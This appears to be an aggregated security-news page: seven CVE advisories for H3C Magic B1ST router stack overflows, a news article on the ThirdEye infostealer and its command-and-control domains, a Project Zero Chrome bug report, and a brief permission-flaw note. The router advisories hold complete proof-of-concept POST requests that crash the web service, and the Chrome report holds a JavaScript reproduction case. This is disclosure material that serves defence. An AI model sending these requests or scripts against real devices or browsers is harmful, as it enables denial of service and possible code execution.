A stack overflow in the AddWlanMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddWlanList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v7 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddWlanMacList&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;

**Result**

the process webs restart

CVE-2023-34935: vuln/H3C_B1STW/CVE-2023-34935.md at main · h4kuy4/vuln

A stack overflow in the UpdateMacClone function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateMacClone, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v9 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateMacClone&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34936: vuln/H3C_B1STW/CVE-2023-34936.md at main · h4kuy4/vuln

A stack overflow in the UpdateWanMode function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateWanMode, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v6 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateWanMode&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34932: vuln/H3C_B1STW/CVE-2023-34932.md at main · h4kuy4/vuln

A stack overflow in the EditWlanMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is EditWlanMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v27 on the stack. In this function, the length of param is limited to 511 Bytes，but v27 only have 64 Byte. Also, the parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 173
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp?refresh=yes?refreshFlag=Tue%20Jun%2006%202023%2016:39:29%20GMT+0800%20(China%20Standard%20Time)
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=EditWlanMacList&GO=wan\_new.asp&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34931: vuln/H3C_B1STW/CVE-2023-34931.md at main · h4kuy4/vuln

A stack overflow in the AddMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34929: vuln/H3C_B1STW/CVE-2023-34929.md at main · h4kuy4/vuln

A stack overflow in the Edit_BasicSSID function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is Edit_BasicSSID, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v33 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34928: vuln/H3C_B1STW/CVE-2023-34928.md at main · h4kuy4/vuln

A stack overflow in the EditMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is EditMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12, v14, v15, v13 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=EditMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34930: vuln/H3C_B1STW/CVE-2023-34930.md at main · h4kuy4/vuln

By Waqas
For now, ThirdEye infostealer has demonstrated behavior that is highly malicious, albeit not-so-sophisticated in its patterns.
This is a post from HackRead.com Read the original post: Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

**While the ThirdEye infostealer is now in town, researchers have already identified several of its variants, all aiming at victims’ data.**

FortiGuard Labs uncovered a not-so-sophisticated but highly malicious infostealer while analyzing suspicious files during a cursory review. They named this ThirdEye Infostealer. According to the report authored by Fred Gutierrez, James Slaughter, and Shunichi Imano, researchers became suspicious after spotting an archive file in Russian titled “Табель учета рабочего времени.zip“, which means “time sheet” in the English language.

This file contained two additional files, both with double extensions, including a .exe extension and another document-related extension. One of these files is titled “CMK Правила оформления больничных листов.pdf.exe.”

The title means “QMS Rules for issuing sick leave” in the English language. Further investigation revealed traits that researchers had previously seen in ThirdEye infostealer samples they had been detecting since early April 2023.

**Various Versions of ThirdEye ThirdEye Infostealer Discovered**

The earliest sample of ThirdEye infostealer was discovered on 3 April 2023 at 12:36:37 GMT. This sample collected client\_hash,  OS\_type, host\_name and user\_name and sent it to C2 server “(glovatickets(.)ru/ch3ckState)” with a custom web request header: Cookie: 3rd\_eye=. It was submitted to a file scanning service on 4 April 2023.

A few weeks later, researchers found a variant which had a compile timestamp of 26 April 09:56:55 GMT. This variant collected additional data, including the BIOS vendor and release date, RAM size, CPU core number, user’s desktop files list, list of registered users on the device, and network interface data. However, this version crashes in some virtual machines.

One day later, they found a new variant with just one change: it used a PDF icon. This variant used “(ohmycars(.)ru/ch3ckState)” as C2 communications.

Later, another variant was found which gathered additional data such as total and free disk space on the C drive, domain name, network ports list, list of programs and version numbers, systemUptime, CD-ROM, drive letters volume information, currently running processes list, and programs installed in the Program Files directory.

Another file in the archive WAS titled “Табель учета рабочего времени.xls.exe,” which is a ThirdEye infostealer variant capable of performing the same activities.

Credit: FortiGuard Labs

**Functionalities of ThirdEye Infostealer**

in their blog post, FortiGuard Labs’ researchers revealed that ThirdEye Infostealer can steal system data from infected devices, including BIOS and hardware information. In addition, it can enumerate folder files, running processes, and network data.

Upon execution, the infostealer quickly gathers the data and transmits it to a C2 server hosted at “shlalala(.)ru/ch3ckState.” Apart from this, ThirdEye Infostealer does not perform any other function.

While researching, an interesting feature was noted – a string named 3rd eye, from which they derived the name of this malware family. The malware decrypts this string and uses it with another hash value to identify the C2 server. ThirdEye infostealer isn’t too sophisticated; however, it is evolving fast. Some recently collected samples stole more system data than the previously discovered versions.

Moreover, researchers noted that the infostealer targets Windows-based systems with a medium severity level. There is currently no evidence that ThirdEye Infostealer has been used in attacks.

However, since it is designed to collect data from compromised devices and systems, it can come in handy for cybercriminals in launching attacks. Researchers believe that all previous and latest variants of ThirdEye Infostealer are named in Russian, so the attacker is probably eyeing Russian-speaking organizations to deploy malware.

**RELATED ARTICLES**

1.  Legion: SMS Hijacking Malware Sold on Telegram
2.  New Jupyter infostealer dropped through MSI installer
3.  Malicious ChatGPT Installers Distribute RedLine Stealer
4.  Infostealer Adrozek malware hits Firefox, Chrome browser
5.  New MacStealer Malware Targeting macOS Catalina Devices

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS  
1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.  
2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:  
```  
IDLMemberInstaller::InstallAttributes ->  
InstallAttribute ->  
Object::SetAccessorProperty ->  
JSObject::DefineAccessor  
```  
3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.  
4. Some origin trials install attributes directly on the global object.

To exploit the issue:

1. Add a non-configurable property to the global object.  
2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.  
3. Enable an origin trial that redefines the property as configurable.  
4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION  
Google Chrome 112.0.5615.49 (Official Build) (arm64)  
Chromium 114.0.5713.0 (Developer Build) (64-bit) 

REPRODUCTION CASE  
```  
<body>  
<script>  
var container = [{}];  
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(  
    globalThis,  
    'documentPictureInPicture',  
    { configurable: false, writable: true, value: {} });  
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.  
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property  
// on the global object.  
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content =  
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +  
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +  
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';  
document.head.appendChild(meta);

delete documentPictureInPicture;  
trigger();  
container[0].prop; // Trying to access a property of the hole object should cause to a crash.  
</script>  
</body>  
```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: glazunov@google.com

Chrome Internal JavaScript Object Access Via Origin Trials

The Contour Service was not checking that users had permission to create an analysis for a given dataset. This could allow an attacker to clutter up Compass folders with extraneous analyses, that the attacker would otherwise not have permission to create.

Tag

#chrome